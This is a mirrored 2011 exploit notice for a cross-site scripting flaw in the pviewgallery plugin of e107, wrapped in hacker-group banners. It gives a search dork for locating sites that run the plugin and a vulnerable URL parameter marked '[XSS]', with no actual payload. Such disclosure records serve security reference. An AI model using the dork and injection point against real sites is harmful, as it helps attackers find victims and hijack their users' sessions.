Pranian Group e107 Cross Site Scripting

CVE	Category	Price	Severity
N/A	CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')	Not disclosed	Medium

Author	Risk	Exploitation Type	Date
Pranian Group	High	Remote	2011-09-09

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2011090019

Below is a copy:

################################  IRANIAN THE BEST HACKERS IN THE WORLD ##################
#################### ####################
##
## Cross Site Scripting Vulnerabilities
##
## Pranian Group e107 
##                           
###############################################################
###############################################################
###############################################################
###############################################################
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email  : [email protected]
##  
## Persian Gulf 4 Ever!
#############################
#############################
#############################
#############################
#############################
##
##

Dork : "by Pranian Group e107"

Exploite:

www.victim.com/plugins/pviewgallery/pviewgallery.php?album=1&page=[XSS]

#########################################################################################
SpeCial TanX To : Skote_Vahshat
##########################################################################################
###############################  IRANIAN THE BEST HACKERS IN THE WORLD ##################

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum